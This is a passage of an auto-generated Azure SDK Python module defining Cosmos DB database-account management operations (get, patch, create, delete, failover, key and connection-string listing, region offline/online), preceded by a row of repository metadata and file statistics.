| 41.87406 | 113 | 0.658347 | 3,409 | 22,277 | 4.144617 | 0.033734 | 0.10574 | 0.127681 | 0.123859 | 0.956685 | 0.953854 | 0.953783 | 0.953712 | 0.950527 | 0.946351 | 0 | 0.030874 | 0.153791 | 22,277 | 531 | 114 | 41.952919 | 0.718636 | 0.086771 | 0 | 0.752809 | 0 | 0 | 0.116286 | 0.004528 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036517 | false | 0 | 0.008427 | 0 | 0.044944 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e831db4ba66bbc8496e27e166b0d5befc0cad15 | 308,676 | py | Python | sdk/cosmos/azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/operations/_database_accounts_operations.py | kushan2018/azure-sdk-for-python | 08a9296207281f4e90e23cf7a30173863accc867 | [
"MIT"
] | null | null | null | sdk/cosmos/azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/operations/_database_accounts_operations.py | kushan2018/azure-sdk-for-python | 08a9296207281f4e90e23cf7a30173863accc867 | [
"MIT"
] | 1 | 2020-03-06T05:57:16.000Z | 2020-03-06T05:57:16.000Z | sdk/cosmos/azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/operations/_database_accounts_operations.py | kushan2018/azure-sdk-for-python | 08a9296207281f4e90e23cf7a30173863accc867 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class DatabaseAccountsOperations(object):
"""DatabaseAccountsOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the API to be used with the client request. The current version is 2015-04-08. Constant value: "2015-04-08".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2015-04-08"
self.config = config
def get(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves the properties of an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DatabaseAccount or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.DatabaseAccount or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
def _patch_initial(
self, resource_group_name, account_name, tags=None, capabilities=None, custom_headers=None, raw=False, **operation_config):
update_parameters = models.DatabaseAccountPatchParameters(tags=tags, capabilities=capabilities)
# Construct URL
url = self.patch.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_parameters, 'DatabaseAccountPatchParameters')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def patch(
self, resource_group_name, account_name, tags=None, capabilities=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Patches the properties of an existing Azure Cosmos DB database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param tags:
:type tags: dict[str, str]
:param capabilities: List of Cosmos DB capabilities for the account
:type capabilities: list[~azure.mgmt.cosmosdb.models.Capability]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns DatabaseAccount or
ClientRawResponse<DatabaseAccount> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.DatabaseAccount]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.DatabaseAccount]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._patch_initial(
resource_group_name=resource_group_name,
account_name=account_name,
tags=tags,
capabilities=capabilities,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('DatabaseAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
patch.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
def _create_or_update_initial(
self, resource_group_name, account_name, create_update_parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_parameters, 'DatabaseAccountCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, account_name, create_update_parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates an Azure Cosmos DB database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param create_update_parameters: The parameters to provide for the
current database account.
:type create_update_parameters:
~azure.mgmt.cosmosdb.models.DatabaseAccountCreateUpdateParameters
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns DatabaseAccount or
ClientRawResponse<DatabaseAccount> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.DatabaseAccount]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.DatabaseAccount]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
account_name=account_name,
create_update_parameters=create_update_parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('DatabaseAccount', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
def _delete_initial(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, account_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
account_name=account_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
def _failover_priority_change_initial(
self, resource_group_name, account_name, failover_policies, custom_headers=None, raw=False, **operation_config):
failover_parameters = models.FailoverPolicies(failover_policies=failover_policies)
# Construct URL
url = self.failover_priority_change.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(failover_parameters, 'FailoverPolicies')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def failover_priority_change(
self, resource_group_name, account_name, failover_policies, custom_headers=None, raw=False, polling=True, **operation_config):
"""Changes the failover priority for the Azure Cosmos DB database account.
A failover priority of 0 indicates a write region. The maximum value
for a failover priority = (total number of regions - 1). Failover
priority values must be unique for each of the regions in which the
database account exists.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param failover_policies: List of failover policies.
:type failover_policies:
list[~azure.mgmt.cosmosdb.models.FailoverPolicy]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._failover_priority_change_initial(
resource_group_name=resource_group_name,
account_name=account_name,
failover_policies=failover_policies,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
failover_priority_change.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/failoverPriorityChange'}
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all the Azure Cosmos DB database accounts available under the
subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of DatabaseAccount
:rtype:
~azure.mgmt.cosmosdb.models.DatabaseAccountPaged[~azure.mgmt.cosmosdb.models.DatabaseAccount]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.DatabaseAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DocumentDB/databaseAccounts'}
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Lists all the Azure Cosmos DB database accounts available under the
given resource group.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of DatabaseAccount
:rtype:
~azure.mgmt.cosmosdb.models.DatabaseAccountPaged[~azure.mgmt.cosmosdb.models.DatabaseAccount]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.DatabaseAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts'}
def list_keys(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the access keys for the specified Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DatabaseAccountListKeysResult or ClientRawResponse if
raw=true
:rtype: ~azure.mgmt.cosmosdb.models.DatabaseAccountListKeysResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.list_keys.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccountListKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/listKeys'}
def list_connection_strings(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the connection strings for the specified Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DatabaseAccountListConnectionStringsResult or
ClientRawResponse if raw=true
:rtype:
~azure.mgmt.cosmosdb.models.DatabaseAccountListConnectionStringsResult
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.list_connection_strings.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccountListConnectionStringsResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_connection_strings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/listConnectionStrings'}
def _offline_region_initial(
self, resource_group_name, account_name, region, custom_headers=None, raw=False, **operation_config):
region_parameter_for_offline = models.RegionForOnlineOffline(region=region)
# Construct URL
url = self.offline_region.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(region_parameter_for_offline, 'RegionForOnlineOffline')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ErrorResponseException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def offline_region(
self, resource_group_name, account_name, region, custom_headers=None, raw=False, polling=True, **operation_config):
"""Offline the specified region for the specified Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param region: Cosmos DB region, with spaces between words and each
word capitalized.
:type region: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises:
:class:`ErrorResponseException<azure.mgmt.cosmosdb.models.ErrorResponseException>`
"""
raw_result = self._offline_region_initial(
resource_group_name=resource_group_name,
account_name=account_name,
region=region,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
offline_region.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/offlineRegion'}
def _online_region_initial(
self, resource_group_name, account_name, region, custom_headers=None, raw=False, **operation_config):
region_parameter_for_online = models.RegionForOnlineOffline(region=region)
# Construct URL
url = self.online_region.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(region_parameter_for_online, 'RegionForOnlineOffline')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ErrorResponseException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def online_region(
self, resource_group_name, account_name, region, custom_headers=None, raw=False, polling=True, **operation_config):
"""Online the specified region for the specified Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
